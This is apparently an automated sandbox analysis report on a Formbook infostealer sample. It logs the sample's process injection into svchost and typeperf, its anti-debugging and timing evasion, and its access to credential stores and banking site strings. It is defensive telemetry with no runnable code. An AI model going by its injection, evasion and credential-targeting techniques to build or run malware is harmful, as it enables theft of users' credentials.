            Source: C:\Program Files (x86)\jiQHbjscaMcKbPOlOroupNlgeKQaKZsecmPTcdBGPKRlFNgULSZwTYQAEfmJOzLaHJAOeFYgauUXuA\uxEGEjhWYrJv.exeCode function: 14_2_04DD7FD514_2_04DD7FD5
            Source: C:\Program Files (x86)\jiQHbjscaMcKbPOlOroupNlgeKQaKZsecmPTcdBGPKRlFNgULSZwTYQAEfmJOzLaHJAOeFYgauUXuA\uxEGEjhWYrJv.exeCode function: 14_2_04DE074514_2_04DE0745
            Source: C:\Program Files (x86)\jiQHbjscaMcKbPOlOroupNlgeKQaKZsecmPTcdBGPKRlFNgULSZwTYQAEfmJOzLaHJAOeFYgauUXuA\uxEGEjhWYrJv.exeCode function: 14_2_04DDD0B514_2_04DDD0B5
            Source: C:\Program Files (x86)\jiQHbjscaMcKbPOlOroupNlgeKQaKZsecmPTcdBGPKRlFNgULSZwTYQAEfmJOzLaHJAOeFYgauUXuA\uxEGEjhWYrJv.exeCode function: 14_2_04DD81F514_2_04DD81F5
            Source: C:\Program Files (x86)\jiQHbjscaMcKbPOlOroupNlgeKQaKZsecmPTcdBGPKRlFNgULSZwTYQAEfmJOzLaHJAOeFYgauUXuA\uxEGEjhWYrJv.exeCode function: 14_2_04DDE92514_2_04DDE925
            Source: C:\Program Files (x86)\jiQHbjscaMcKbPOlOroupNlgeKQaKZsecmPTcdBGPKRlFNgULSZwTYQAEfmJOzLaHJAOeFYgauUXuA\uxEGEjhWYrJv.exeCode function: 14_2_04DD627514_2_04DD6275
            Source: C:\Windows\SysWOW64\typeperf.exe | Code function: String function: 0312B970 appears 263 times
            Source: C:\Windows\SysWOW64\typeperf.exe | Code function: String function: 03175130 appears 36 times
            Source: C:\Windows\SysWOW64\typeperf.exe | Code function: String function: 031BF290 appears 105 times
            Source: C:\Windows\SysWOW64\typeperf.exe | Code function: String function: 03187E54 appears 88 times
            Source: C:\Windows\SysWOW64\typeperf.exe | Code function: String function: 031AEA12 appears 84 times
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 03C75130 appears 36 times
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 03C2B970 appears 263 times
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 03C87E54 appears 88 times
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 03CAEA12 appears 84 times
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 03CBF290 appears 105 times
            Source: sa7Bw41TUq.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: 9.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 (reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23)
            Source: 9.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 (same rule metadata as above)
            Source: 0000000C.00000002.3737461666.0000000000BB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 (same rule metadata as above)
            Source: 0000000C.00000002.3737315515.0000000000B60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 (same rule metadata as above)
            Source: 0000000C.00000002.3725825178.00000000005B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 (same rule metadata as above)
            Source: 00000009.00000002.1688985587.0000000009690000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 (same rule metadata as above)
            Source: 00000009.00000002.1671982092.00000000067E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 (same rule metadata as above)
            Source: 0000000B.00000002.3737482520.0000000004BE0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 (same rule metadata as above)
            Source: 00000009.00000002.1670445021.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 (same rule metadata as above)
            Source: 0000000E.00000002.3739752184.0000000004DC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 (same rule metadata as above)
            Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@7/2@16/9
            Source: C:\Users\user\Desktop\sa7Bw41TUq.exe | File created: C:\Users\user~1\AppData\Local\Temp\camellin
            Source: sa7Bw41TUq.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\sa7Bw41TUq.exe | File read: C:\Users\desktop.ini
            Source: C:\Users\user\Desktop\sa7Bw41TUq.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: typeperf.exe, 0000000C.00000002.3730128385.0000000000A3A000.00000004.00000020.00020000.00000000.sdmp, typeperf.exe, 0000000C.00000002.3730128385.0000000000A06000.00000004.00000020.00020000.00000000.sdmp, typeperf.exe, 0000000C.00000003.1874628984.0000000000A19000.00000004.00000020.00020000.00000000.sdmp, typeperf.exe, 0000000C.00000003.1874720843.0000000000A06000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: sa7Bw41TUq.exe | ReversingLabs: Detection: 60%
            Source: C:\Users\user\Desktop\sa7Bw41TUq.exe | File read: C:\Users\user\Desktop\sa7Bw41TUq.exe
            Source: unknown | Process created: C:\Users\user\Desktop\sa7Bw41TUq.exe "C:\Users\user\Desktop\sa7Bw41TUq.exe"
            Source: C:\Users\user\Desktop\sa7Bw41TUq.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\sa7Bw41TUq.exe"
            Source: C:\Program Files (x86)\jiQHbjscaMcKbPOlOroupNlgeKQaKZsecmPTcdBGPKRlFNgULSZwTYQAEfmJOzLaHJAOeFYgauUXuA\uxEGEjhWYrJv.exe | Process created: C:\Windows\SysWOW64\typeperf.exe "C:\Windows\SysWOW64\typeperf.exe"
            Source: C:\Windows\SysWOW64\typeperf.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\sa7Bw41TUq.exe | Section loaded: apphelp.dll
            Source: C:\Users\user\Desktop\sa7Bw41TUq.exe | Section loaded: wsock32.dll
            Source: C:\Users\user\Desktop\sa7Bw41TUq.exe | Section loaded: version.dll
            Source: C:\Users\user\Desktop\sa7Bw41TUq.exe | Section loaded: winmm.dll
            Source: C:\Users\user\Desktop\sa7Bw41TUq.exe | Section loaded: mpr.dll
            Source: C:\Users\user\Desktop\sa7Bw41TUq.exe | Section loaded: wininet.dll
            Source: C:\Users\user\Desktop\sa7Bw41TUq.exe | Section loaded: userenv.dll
            Source: C:\Users\user\Desktop\sa7Bw41TUq.exe | Section loaded: uxtheme.dll
            Source: C:\Users\user\Desktop\sa7Bw41TUq.exe | Section loaded: windows.storage.dll
            Source: C:\Users\user\Desktop\sa7Bw41TUq.exe | Section loaded: wldp.dll
            Source: C:\Users\user\Desktop\sa7Bw41TUq.exe | Section loaded: kernel.appcore.dll
            Source: C:\Windows\SysWOW64\typeperf.exe | Section loaded: pdh.dll
            Source: C:\Windows\SysWOW64\typeperf.exe | Section loaded: wininet.dll
            Source: C:\Windows\SysWOW64\typeperf.exe | Section loaded: kernel.appcore.dll
            Source: C:\Windows\SysWOW64\typeperf.exe | Section loaded: uxtheme.dll
            Source: C:\Windows\SysWOW64\typeperf.exe | Section loaded: ieframe.dll
            Source: C:\Windows\SysWOW64\typeperf.exe | Section loaded: iertutil.dll
            Source: C:\Windows\SysWOW64\typeperf.exe | Section loaded: netapi32.dll
            Source: C:\Windows\SysWOW64\typeperf.exe | Section loaded: version.dll
            Source: C:\Windows\SysWOW64\typeperf.exe | Section loaded: userenv.dll
            Source: C:\Windows\SysWOW64\typeperf.exe | Section loaded: winhttp.dll
            Source: C:\Windows\SysWOW64\typeperf.exe | Section loaded: wkscli.dll
            Source: C:\Windows\SysWOW64\typeperf.exe | Section loaded: netutils.dll
            Source: C:\Windows\SysWOW64\typeperf.exe | Section loaded: sspicli.dll
            Source: C:\Windows\SysWOW64\typeperf.exe | Section loaded: windows.storage.dll
            Source: C:\Windows\SysWOW64\typeperf.exe | Section loaded: wldp.dll
            Source: C:\Windows\SysWOW64\typeperf.exe | Section loaded: profapi.dll
            Source: C:\Windows\SysWOW64\typeperf.exe | Section loaded: secur32.dll
            Source: C:\Windows\SysWOW64\typeperf.exe | Section loaded: mlang.dll
            Source: C:\Windows\SysWOW64\typeperf.exe | Section loaded: propsys.dll
            Source: C:\Windows\SysWOW64\typeperf.exe | Section loaded: winsqlite3.dll
            Source: C:\Windows\SysWOW64\typeperf.exe | Section loaded: vaultcli.dll
            Source: C:\Windows\SysWOW64\typeperf.exe | Section loaded: wintypes.dll
            Source: C:\Windows\SysWOW64\typeperf.exe | Section loaded: dpapi.dll
            Source: C:\Windows\SysWOW64\typeperf.exe | Section loaded: cryptbase.dll
            Source: C:\Program Files (x86)\jiQHbjscaMcKbPOlOroupNlgeKQaKZsecmPTcdBGPKRlFNgULSZwTYQAEfmJOzLaHJAOeFYgauUXuA\uxEGEjhWYrJv.exe | Section loaded: wininet.dll
            Source: C:\Program Files (x86)\jiQHbjscaMcKbPOlOroupNlgeKQaKZsecmPTcdBGPKRlFNgULSZwTYQAEfmJOzLaHJAOeFYgauUXuA\uxEGEjhWYrJv.exe | Section loaded: mswsock.dll
            Source: C:\Program Files (x86)\jiQHbjscaMcKbPOlOroupNlgeKQaKZsecmPTcdBGPKRlFNgULSZwTYQAEfmJOzLaHJAOeFYgauUXuA\uxEGEjhWYrJv.exe | Section loaded: dnsapi.dll
            Source: C:\Program Files (x86)\jiQHbjscaMcKbPOlOroupNlgeKQaKZsecmPTcdBGPKRlFNgULSZwTYQAEfmJOzLaHJAOeFYgauUXuA\uxEGEjhWYrJv.exe | Section loaded: iphlpapi.dll
            Source: C:\Program Files (x86)\jiQHbjscaMcKbPOlOroupNlgeKQaKZsecmPTcdBGPKRlFNgULSZwTYQAEfmJOzLaHJAOeFYgauUXuA\uxEGEjhWYrJv.exe | Section loaded: fwpuclnt.dll
            Source: C:\Program Files (x86)\jiQHbjscaMcKbPOlOroupNlgeKQaKZsecmPTcdBGPKRlFNgULSZwTYQAEfmJOzLaHJAOeFYgauUXuA\uxEGEjhWYrJv.exe | Section loaded: rasadhlp.dll
            Source: C:\Users\user\Desktop\sa7Bw41TUq.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
            Source: Window Recorder | Window detected: More than 3 window changes detected
            Source: C:\Windows\SysWOW64\typeperf.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
            Source: sa7Bw41TUq.exe | Static file information: File size 1364575 > 1048576
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: uxEGEjhWYrJv.exe, 0000000B.00000000.1558723774.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp, uxEGEjhWYrJv.exe, 0000000E.00000002.3737429493.0000000000FAE000.00000002.00000001.01000000.00000005.sdmp
            Source: Binary string: typeperf.pdb source: svchost.exe, 00000009.00000003.1628080025.0000000003624000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.1627986392.000000000361B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.1628064356.000000000361A000.00000004.00000020.00020000.00000000.sdmp, uxEGEjhWYrJv.exe, 0000000B.00000002.3733446394.0000000000788000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdbUGP source: svchost.exe, 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000009.00000002.1670896674.0000000003D9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.1543886073.0000000003A00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.1542199725.0000000003800000.00000004.00000020.00020000.00000000.sdmp, typeperf.exe, 0000000C.00000003.1670422050.0000000002DA5000.00000004.00000020.00020000.00000000.sdmp, typeperf.exe, 0000000C.00000002.3738573348.0000000003100000.00000040.00001000.00020000.00000000.sdmp, typeperf.exe, 0000000C.00000003.1683622628.0000000002F51000.00000004.00000020.00020000.00000000.sdmp, typeperf.exe, 0000000C.00000002.3738573348.000000000329E000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: svchost.exe, svchost.exe, 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000009.00000002.1670896674.0000000003D9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.1543886073.0000000003A00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.1542199725.0000000003800000.00000004.00000020.00020000.00000000.sdmp, typeperf.exe, typeperf.exe, 0000000C.00000003.1670422050.0000000002DA5000.00000004.00000020.00020000.00000000.sdmp, typeperf.exe, 0000000C.00000002.3738573348.0000000003100000.00000040.00001000.00020000.00000000.sdmp, typeperf.exe, 0000000C.00000003.1683622628.0000000002F51000.00000004.00000020.00020000.00000000.sdmp, typeperf.exe, 0000000C.00000002.3738573348.000000000329E000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: typeperf.exe, 0000000C.00000002.3739193871.000000000372C000.00000004.10000000.00040000.00000000.sdmp, typeperf.exe, 0000000C.00000002.3730128385.0000000000981000.00000004.00000020.00020000.00000000.sdmp, uxEGEjhWYrJv.exe, 0000000E.00000000.1757312784.000000000298C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000010.00000002.1987185043.000000003867C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: typeperf.pdbGCTL source: svchost.exe, 00000009.00000003.1628080025.0000000003624000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.1627986392.000000000361B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.1628064356.000000000361A000.00000004.00000020.00020000.00000000.sdmp, uxEGEjhWYrJv.exe, 0000000B.00000002.3733446394.0000000000788000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: typeperf.exe, 0000000C.00000002.3739193871.000000000372C000.00000004.10000000.00040000.00000000.sdmp, typeperf.exe, 0000000C.00000002.3730128385.0000000000981000.00000004.00000020.00020000.00000000.sdmp, uxEGEjhWYrJv.exe, 0000000E.00000000.1757312784.000000000298C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000010.00000002.1987185043.000000003867C000.00000004.80000000.00040000.00000000.sdmp
            Source: sa7Bw41TUq.exe | Static PE information: real checksum: 0xa961f should be: 0x14ea0c
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_00401540 push es; retf 9_2_004016BD
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_0040CB10 push edi; retf 9_2_0040CB11
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_00415BF6 push ecx; iretd 9_2_00415C03
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_004034D0 push eax; ret 9_2_004034D2
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_004144A0 push ebp; retf 9_2_004144A8
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_00418D0E push 00000067h; iretd 9_2_00418D72
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_004145D6 pushad ; ret 9_2_004145D7
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_0040160B push es; retf 9_2_004016BD
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_0040CF38 push ss; retf 9_2_0040CF54
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_03C309AD push ecx; mov dword ptr [esp], ecx 9_2_03C309B6
            Source: C:\Windows\SysWOW64\typeperf.exe | Code function: 12_2_031309AD push ecx; mov dword ptr [esp], ecx 12_2_031309B6
            Source: C:\Windows\SysWOW64\typeperf.exe | Code function: 12_2_005D1139 push 074A8058h; ret 12_2_005D118C
            Source: C:\Windows\SysWOW64\typeperf.exe | Code function: 12_2_005CC087 push es; retf 12_2_005CC08A
            Source: C:\Windows\SysWOW64\typeperf.exe | Code function: 12_2_005D115C push 074A8058h; ret 12_2_005D118C
            Source: C:\Windows\SysWOW64\typeperf.exe | Code function: 12_2_005B963D push edi; retf 12_2_005B963E
            Source: C:\Windows\SysWOW64\typeperf.exe | Code function: 12_2_005D478B push ss; ret 12_2_005D478C
            Source: C:\Windows\SysWOW64\typeperf.exe | Code function: 12_2_005CB780 push ecx; iretd 12_2_005CB783
            Source: C:\Windows\SysWOW64\typeperf.exe | Code function: 12_2_005D47AB push 0000000Eh; iretd 12_2_005D47AD
            Source: C:\Windows\SysWOW64\typeperf.exe | Code function: 12_2_005C583B push 00000067h; iretd 12_2_005C589F
            Source: C:\Windows\SysWOW64\typeperf.exe | Code function: 12_2_005CAC61 push DC60BA47h; iretd 12_2_005CAC6C
            Source: C:\Windows\SysWOW64\typeperf.exe | Code function: 12_2_005C9C80 push eax; ret 12_2_005C9C81
            Source: C:\Windows\SysWOW64\typeperf.exe | Code function: 12_2_02E5B3CA pushfd ; retf 12_2_02E5B3C9
            Source: C:\Windows\SysWOW64\typeperf.exe | Code function: 12_2_02E5B397 pushfd ; retf 12_2_02E5B3C9
            Source: C:\Windows\SysWOW64\typeperf.exe | Code function: 12_2_02E5D311 push ebx; retf 12_2_02E5D312
            Source: C:\Windows\SysWOW64\typeperf.exe | Code function: 12_2_02E5D163 push ebp; ret 12_2_02E5D169
            Source: C:\Windows\SysWOW64\typeperf.exe | Code function: 12_2_02E5D10F push ebp; ret 12_2_02E5D169
            Source: C:\Windows\SysWOW64\typeperf.exe | Code function: 12_2_02E5B406 pushfd ; retf 12_2_02E5B3C9
            Source: C:\Windows\SysWOW64\typeperf.exe | Code function: 12_2_02E5BA46 pushad ; iretd 12_2_02E5BA49
            Source: C:\Windows\SysWOW64\typeperf.exe | Code function: 12_2_02E52DEB push ss; ret 12_2_02E52DF7
            Source: C:\Program Files (x86)\jiQHbjscaMcKbPOlOroupNlgeKQaKZsecmPTcdBGPKRlFNgULSZwTYQAEfmJOzLaHJAOeFYgauUXuA\uxEGEjhWYrJv.exe | Code function: 14_2_04DE6C25 push ecx; iretd 14_2_04DE6C28
            Source: C:\Program Files (x86)\jiQHbjscaMcKbPOlOroupNlgeKQaKZsecmPTcdBGPKRlFNgULSZwTYQAEfmJOzLaHJAOeFYgauUXuA\uxEGEjhWYrJv.exe | Code function: 14_2_04DE0D3F push 00000067h; iretd 14_2_04DE0D44
            Source: C:\Users\user\Desktop\sa7Bw41TUq.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\typeperf.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            Source: C:\Users\user\Desktop\sa7Bw41TUq.exeAPI/Special instruction interceptor: Address: 4008324
            Source: C:\Windows\SysWOW64\typeperf.exeAPI/Special instruction interceptor: Address: 7FFB2CECD324
            Source: C:\Windows\SysWOW64\typeperf.exeAPI/Special instruction interceptor: Address: 7FFB2CECD7E4
            Source: C:\Windows\SysWOW64\typeperf.exeAPI/Special instruction interceptor: Address: 7FFB2CECD944
            Source: C:\Windows\SysWOW64\typeperf.exeAPI/Special instruction interceptor: Address: 7FFB2CECD504
            Source: C:\Windows\SysWOW64\typeperf.exeAPI/Special instruction interceptor: Address: 7FFB2CECD544
            Source: C:\Windows\SysWOW64\typeperf.exeAPI/Special instruction interceptor: Address: 7FFB2CECD1E4
            Source: C:\Windows\SysWOW64\typeperf.exeAPI/Special instruction interceptor: Address: 7FFB2CED0154
            Source: C:\Windows\SysWOW64\typeperf.exeAPI/Special instruction interceptor: Address: 7FFB2CECDA44
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C5BBA0 rdtsc 9_2_03C5BBA0
            Source: C:\Windows\SysWOW64\typeperf.exeWindow / User API: threadDelayed 9819
            Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 0.8 %
            Source: C:\Windows\SysWOW64\typeperf.exeAPI coverage: 3.1 %
            Source: C:\Windows\SysWOW64\typeperf.exe TID: 7516Thread sleep count: 154 > 30
            Source: C:\Windows\SysWOW64\typeperf.exe TID: 7516Thread sleep time: -308000s >= -30000s
            Source: C:\Windows\SysWOW64\typeperf.exe TID: 7516Thread sleep count: 9819 > 30
            Source: C:\Windows\SysWOW64\typeperf.exe TID: 7516Thread sleep time: -19638000s >= -30000s
            Source: C:\Program Files (x86)\jiQHbjscaMcKbPOlOroupNlgeKQaKZsecmPTcdBGPKRlFNgULSZwTYQAEfmJOzLaHJAOeFYgauUXuA\uxEGEjhWYrJv.exe TID: 7560Thread sleep time: -85000s >= -30000s
            Source: C:\Program Files (x86)\jiQHbjscaMcKbPOlOroupNlgeKQaKZsecmPTcdBGPKRlFNgULSZwTYQAEfmJOzLaHJAOeFYgauUXuA\uxEGEjhWYrJv.exe TID: 7560Thread sleep time: -46500s >= -30000s
            Source: C:\Program Files (x86)\jiQHbjscaMcKbPOlOroupNlgeKQaKZsecmPTcdBGPKRlFNgULSZwTYQAEfmJOzLaHJAOeFYgauUXuA\uxEGEjhWYrJv.exe TID: 7560Thread sleep time: -42000s >= -30000s
            Source: C:\Windows\SysWOW64\typeperf.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 12_2_005CC4D0 FindFirstFileW,FindNextFileW,FindClose,12_2_005CC4D0
            Source: f3663-3k.12.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
            Source: f3663-3k.12.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
            Source: f3663-3k.12.drBinary or memory string: Canara Transaction PasswordVMware20,11696492231}
            Source: f3663-3k.12.drBinary or memory string: interactivebrokers.co.inVMware20,11696492231d
            Source: f3663-3k.12.drBinary or memory string: netportal.hdfcbank.comVMware20,11696492231
            Source: f3663-3k.12.drBinary or memory string: outlook.office.comVMware20,11696492231s
            Source: f3663-3k.12.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
            Source: f3663-3k.12.drBinary or memory string: AMC password management pageVMware20,11696492231
            Source: f3663-3k.12.drBinary or memory string: interactivebrokers.comVMware20,11696492231
            Source: f3663-3k.12.drBinary or memory string: microsoft.visualstudio.comVMware20,11696492231x
            Source: f3663-3k.12.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
            Source: f3663-3k.12.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
            Source: f3663-3k.12.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696492231
            Source: f3663-3k.12.drBinary or memory string: outlook.office365.comVMware20,11696492231t
            Source: f3663-3k.12.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
            Source: f3663-3k.12.drBinary or memory string: discord.comVMware20,11696492231f
            Source: typeperf.exe, 0000000C.00000002.3730128385.0000000000981000.00000004.00000020.00020000.00000000.sdmp, uxEGEjhWYrJv.exe, 0000000E.00000002.3733521567.0000000000A49000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: f3663-3k.12.drBinary or memory string: global block list test formVMware20,11696492231
            Source: f3663-3k.12.drBinary or memory string: dev.azure.comVMware20,11696492231j
            Source: f3663-3k.12.drBinary or memory string: www.interactivebrokers.comVMware20,11696492231}
            Source: f3663-3k.12.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
            Source: f3663-3k.12.drBinary or memory string: bankofamerica.comVMware20,11696492231x
            Source: f3663-3k.12.drBinary or memory string: trackpan.utiitsl.comVMware20,11696492231h
            Source: f3663-3k.12.drBinary or memory string: tasks.office.comVMware20,11696492231o
            Source: f3663-3k.12.drBinary or memory string: account.microsoft.com/profileVMware20,11696492231u
            Source: f3663-3k.12.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696492231
            Source: f3663-3k.12.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
            Source: f3663-3k.12.drBinary or memory string: ms.portal.azure.comVMware20,11696492231
            Source: f3663-3k.12.drBinary or memory string: turbotax.intuit.comVMware20,11696492231t
            Source: f3663-3k.12.drBinary or memory string: secure.bankofamerica.comVMware20,11696492231|UE
            Source: f3663-3k.12.drBinary or memory string: Canara Transaction PasswordVMware20,11696492231x
            Source: f3663-3k.12.drBinary or memory string: Interactive Brokers - HKVMware20,11696492231]
            Source: firefox.exe, 00000010.00000002.1992752490.000002A4F856C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllLL
            Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformation
            Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPort
            Source: C:\Windows\SysWOW64\typeperf.exeProcess queried: DebugPort
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C5BBA0 rdtsc 9_2_03C5BBA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_00417903 LdrLoadDll,9_2_00417903
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03CEC3CD mov eax, dword ptr fs:[00000030h]9_2_03CEC3CD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C3A3C0 mov eax, dword ptr fs:[00000030h]9_2_03C3A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C383C0 mov eax, dword ptr fs:[00000030h]9_2_03C383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03CEB3D0 mov ecx, dword ptr fs:[00000030h]9_2_03CEB3D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03CEF3E6 mov eax, dword ptr fs:[00000030h]9_2_03CEF3E6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03D053FC mov eax, dword ptr fs:[00000030h]9_2_03D053FC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C403E9 mov eax, dword ptr fs:[00000030h]9_2_03C403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C4E3F0 mov eax, dword ptr fs:[00000030h]9_2_03C4E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C663FF mov eax, dword ptr fs:[00000030h]9_2_03C663FF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C2E388 mov eax, dword ptr fs:[00000030h]9_2_03C2E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C5438F mov eax, dword ptr fs:[00000030h]9_2_03C5438F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03D0539D mov eax, dword ptr fs:[00000030h]9_2_03D0539D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C8739A mov eax, dword ptr fs:[00000030h]9_2_03C8739A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C28397 mov eax, dword ptr fs:[00000030h]9_2_03C28397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C533A5 mov eax, dword ptr fs:[00000030h]9_2_03C533A5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C633A0 mov eax, dword ptr fs:[00000030h]9_2_03C633A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03CB2349 mov eax, dword ptr fs:[00000030h]9_2_03CB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C2D34C mov eax, dword ptr fs:[00000030h]9_2_03C2D34C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03D05341 mov eax, dword ptr fs:[00000030h]9_2_03D05341
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C29353 mov eax, dword ptr fs:[00000030h]9_2_03C29353
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03CB035C mov eax, dword ptr fs:[00000030h]9_2_03CB035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03CB035C mov ecx, dword ptr fs:[00000030h]9_2_03CB035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03CFA352 mov eax, dword ptr fs:[00000030h]9_2_03CFA352
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03CEF367 mov eax, dword ptr fs:[00000030h]9_2_03CEF367
